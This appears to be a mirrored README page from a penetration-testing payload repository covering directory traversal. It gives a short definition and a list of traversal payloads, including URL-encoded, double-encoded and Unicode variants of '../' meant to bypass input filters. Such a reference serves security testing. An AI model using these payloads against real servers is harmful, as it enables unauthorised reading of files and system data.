mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-20 07:46:02 +01:00
| .. | ||
| deep_traversal.txt | ||
| directory_traversal.txt | ||
| dotdotpwn.txt | ||
| README.md | ||
Traversal Directory
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
Exploit
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\